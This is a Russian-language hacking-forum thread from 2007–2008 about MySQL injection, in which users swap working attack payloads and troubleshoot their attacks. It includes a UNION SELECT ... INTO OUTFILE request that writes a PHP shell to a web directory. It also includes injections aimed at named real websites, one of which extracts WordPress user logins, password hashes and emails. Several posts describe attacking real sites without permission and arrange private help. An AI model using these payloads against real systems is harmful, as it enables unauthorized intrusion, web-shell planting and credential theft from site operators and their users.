Mysql injection

Тема в разделе "Статьи", создана пользователем Constantine, 21 май 2007.

  1. PAPA
    PAPA Guest
    а как толкать шелл c99?
     
    1 янв 2008
  2. Chakir
    Chakir Новичок
    Симпатии:
    0
    запись файлов в веб директорию (php shell).

    Как показала практика, если мы имеем права file_priv, директорию, доступную на запись всем пользователям, доступную кроме того из web, (иногда, директории upload, banners и тд.), а так же знаем имя хотя бы одной таблицы (mysql.user, например сойдет, если имеется доступ к mysql базе данных), то можно выгрузить произвольный файл на сервер используя инъекцию подобного типа.

    http://site/test.php?id=9999+union+select+null,'',null+from+table1+into+outfile+'/usr/local/site/www/banners/cmd.php'/*

    При этом конструкция from table1 обязательна.

    Если кроме того, на сайте имеется уязвимость, позволяющая выполнять произвольные файлы на сервере, (include("/path/$file.php")), то, в любом случае можно закачать php shell, например в директорию /tmp/, и затем подцепить этот файл оттуда при помощи уязвимости в include.
     
    2 янв 2008
  3. Xapg
    Xapg Новичок
    Симпатии:
    0
    Такой вопрос. Как узнать правельный путь до папки с сайтом?
     
    2 янв 2008
  4. Koller
    Koller Guest
    1) Запустите сканер какой-нибудь который "ищет" узявимости на сайте...например RPVS или тот же xspider
    2) Часто выручал гугл, а именно:
    Этими двумя способами пользуюсь лично я...чаще всего мне их хватает...
     
    2 янв 2008
  5. GettoLove
    GettoLove Guest
    Добрый день-вечер, вот такой вапрос, я нашол инджексыю на одном извесном русском сайте, когда делаю следуший запрос:
    то выбивает такой еррор:
    Зато когда ставлю любую цыфру кроме 1 в ордере тогда выбивает следуйшее:
    Подскажыте чё мне делать, зарание благодарен.
     
    8 янв 2008
  6. Хел
    Хел Guest
    GettoLove,
    стукни мне в асю...помогу. а ресурс таки придется дать...
     
    8 янв 2008
  7. Два вопроса в общем-то.
    1. Есть ли какие-то программы-утилиты для автоматического, а не ручного поиска количества столбцов?
    2. Можно ли узнать какая версия (3, 4, 5) MySQL на предварительном так сказать этапе? ещё до манипуляций с поиском столбцов?
    Заранее спасибо, если на подобные вопросы уже отвечали или они не корректные, просьба отнестись с пониманием, ибо пока это всё для меня новое.
     
    20 янв 2008
  8. Хел
    Хел Guest
    РедБольшевик,
    узнать версию и не только можно с помощью дихотомического поиска.
     
    20 янв 2008
  9. GettoLove
    GettoLove Guest
    да есть такая программа каторая сама находит столбы, называетца "SQL Injection Pen-testing Tool", найдеш ее на форуме, но по мне так намного легче подобрать столбы руками, когда знаеш че делаеш тада легко, посомотри кстати начала этого поста, там все описано...
     
    20 янв 2008
  10. Хел
    Хел Guest
    GettoLove,
    иногда этих столбцов может быть от 50 и выше...я не думаю что при траффе или при объемном сайте ты будеш их подбирать сам.
     
    20 янв 2008
  11. GettoLove
    GettoLove Guest
    Не знаю может я не так все понял, но попался мне один сайт с 80 столбов, подобрал его менше чем за 30 секунд, order by 100 = fualt, by 50 = ok, by 70 = ok, by 90 = fault, by 81 = fault, by 80 = ok, а значит слобов 80 :)

    Добавлено через 20 часов 32 минуты
    Странно ктото может мне обьеснить почему при простом ордер запросе выдаёт ошыбку... Ставил ")" всеравно не помогает... http://www.pfl.com.ua/calendar.php?r=2b+order+by+1/*
     
    Последнее редактирование модератором: 21 янв 2008
    20 янв 2008
  12. spl0it
    spl0it Guest
    Мне кажется ты неправильно понял.. на том сайте никак не может быть 80 столбцов, так как при запросе http://www.pfl.com.ua/calendar.php?r=2b+order+by+80/* ошибка есть, а если бы ты подобрал верное количество столбцов, то ошибки не должно быть..
    Вообще, мне кажется там версия 3 стоит..
     
    Последнее редактирование модератором: 21 янв 2008
    21 янв 2008
  13. GettoLove
    GettoLove Guest
    Не ето ты не правильно понял :) Это 2 разных сообшений, за сайт я добавил сегодня потому как страная ошибка, наверна и вправду там 3я версиа... Ну канечно там не 80 столбов...
     
    Последнее редактирование модератором: 21 янв 2008
    21 янв 2008
  14. GettoLove
    GettoLove Guest
    Доброе время, вот такая проблема, нашол мускл на сайте, подобрал имена нужных столбов и колонок, все бес проблем, а вот только собрался выводить информатцыю - батц и 500 еррор, пробовал обхдить фильтрацыю с помошью "aes_decrypt(aes_encrypt(" и "convert" нет результата!

    Вот 500 еррор:
    Код:
    http://www.warcraftmovies.com/articleview.php?id=-31+union+select+1,concat_ws(char(58),user_login,user_pass,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5+from+wp_users+limit+1,1/*
    
    А от сюда видим что подборка колонок проходила нормально:
    Код:
    http://www.warcraftmovies.com/articleview.php?id=-31+union+select+1,column_name,3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema.columns+where+table_name=0x6D6D6F5F75736572+limit+13,1/*
    
    Заранее благодарен...

    ЗЫ там 5я ветка такчто подобрать таблицы с помошью "where+table_name+like+0xblabla" не было проблем, но меня удивило то что когда я попытался подобрать колонки этим же способом то выбило тотже еррор, так что колонки пришлось подбирать в ручную...
     
    Последнее редактирование модератором: 6 фев 2008
    6 фев 2008
  15. SweetPups
    SweetPups Новичок
    Симпатии:
    0
    Спасибо за статью!

    Я как абсолютный ламер практически всё понял, пока есть только один вопрос. Я проделал всё как написано и получил имя таблицы CHARACTER_SETS и имя столбца CHARACTER_SET_NAME и потом прочел вот это и далее аналогично, сопоставте имена таблиц и столбцов и выводите информацию
    как я только их не пытался засунуть в запрос у меня постоянно вылетает ошибка, подскажите пожалуйста как правильно сформировать запрос или может то что я нашел это совсем не то что нужно ?
    Заранее спасибо.
     
    17 окт 2008
  16. NetSky
    NetSky Guest
    Так ну во-первых, есть статья в этом же разделе, от этого же человека
    https://xaker.name/forvb/showthread.php?t=6950

    Об инъекте в 5-й базе.

    Вообще есть оператор лимит
    Где "x,x" - числа.
    Увеличиваешь первое число и получаешь одну за одной свои таблы и колонки, применяется примерно так:

    Код:
    http://site.com/script.php?id=1'+твой запрос+limit+1,1/*
    То есть подставляем в конец запроса. А вообще читай вторую статью, которую я привел выше, там все намного быстрее и грамотнее.
     
    17 окт 2008
  17. SweetPups
    SweetPups Новичок
    Симпатии:
    0
    NetSky спасибо за ответ.

    Лимитом я пользовался и в первый раз и получал различные названия таблиц и колонок, просто для примера я решил дать по одному названию.
    Я даже скачал программу SQL Helper в этом разделе
    http://www.xaker.name/forvb/showthread.php?t=12116
    и попробывал поработать с ней, всё получилось ) выдала все таблицы, колонки и их содержимое, но хочется все равно разобраться как это делать вручную.

    Читал и делал вроде бы всё, как в той статье, что вы порекомендавали, https://xaker.name/forvb/showthread.php?t=6950
    немного завис на фразе
    Кодируем название колонки в 0xhex, но вроде бы разобрался, скачал
    Hex Editor, пока искал что это за зверь узнал что 0х нужно подставлять перед тем, что получиться. В итоге на первый запрос
    получил название таблицы aisles.
    Далее перевел название в HEK и запросил
    получил название колонки serialnumber.
    Затем работая лимитом нашел name и password

    И решил попробывать вывести информацию
    и получил ошибку.
    Читая статью дальше сделал запрос
    и тоже был послан.

    Почитав статью далее я наткнулся на если и тогда данных вы не получили, значит дело в несовпадении баз, такое очень часто случаеться, особенно с форумами и с прочими поддоменами типа маленьких инет_лабазов и.т.п
    Составил запрос
    получил пустой ответ.

    Если можете подскажите в чем тут ошибка и что я делал не так.



    P.S. В этой статье https://xaker.name/forvb/showthread.php?t=6950 видео файлы не пашут, если кто нибудь перезальет буду признателен.
     
    Последнее редактирование: 21 окт 2008
    21 окт 2008
  18. NetSky
    NetSky Guest
    Если ты подобрал таблицу, которая, как думаешь, явно с юзерами, админами или явно для тебя интересная, можно вывести все колонки с этой таблицы, просто формируешь запрос типа:

    Код:
    http://site.xz/script.php?id=1+union+select+1,2,column_name+from+information_schema.columns+where+table_name+like+'твоя табля(мона в хексе)'+limit+0,1/*
    Вот таким вот образом, чаще всего через лимит, выводишь все, поочередно, колонки, с твоей таблы ;)
     
    21 окт 2008
  19. SweetPups
    SweetPups Новичок
    Симпатии:
    0
    Привет всем!)

    Спасибо большое за совет и предложение помощи, только вот я был всю неделю очень занят на работе, а сегодня, когда собрался обратиться как раз за этой помощью сообщение с форума пропало а номер аськи я не записал, так что если Вы все ещё хотите мне помочь то киньте номер в личное сообщение и я обязательно Вам напишу и задам свои ламерские вопросы.

    А что касаеться этого совета
    то да все работает но этот запрос выводит названия колонок, ( я их уже узнал когда делал такой запрос
    ) и теперь хочу узнать содержимое этих колонок, данные, а вот это сделать как раз и не получается, так что если можете что нить посоветовать пишите.


    NetSky персональное спасибо, хоть совет оказался ответом на другой вопрос, но все равно спасибо потому что чем больше вы пишите тем больше всего можно узнать.
     
    24 окт 2008
  20. Ap0str0F
    Ap0str0F Guest
    SweetPups, в посте #37 в 3-ем и 4-ом запросах 1-ая открывающаяся скобка не нужна..
     
    24 окт 2008
Загрузка...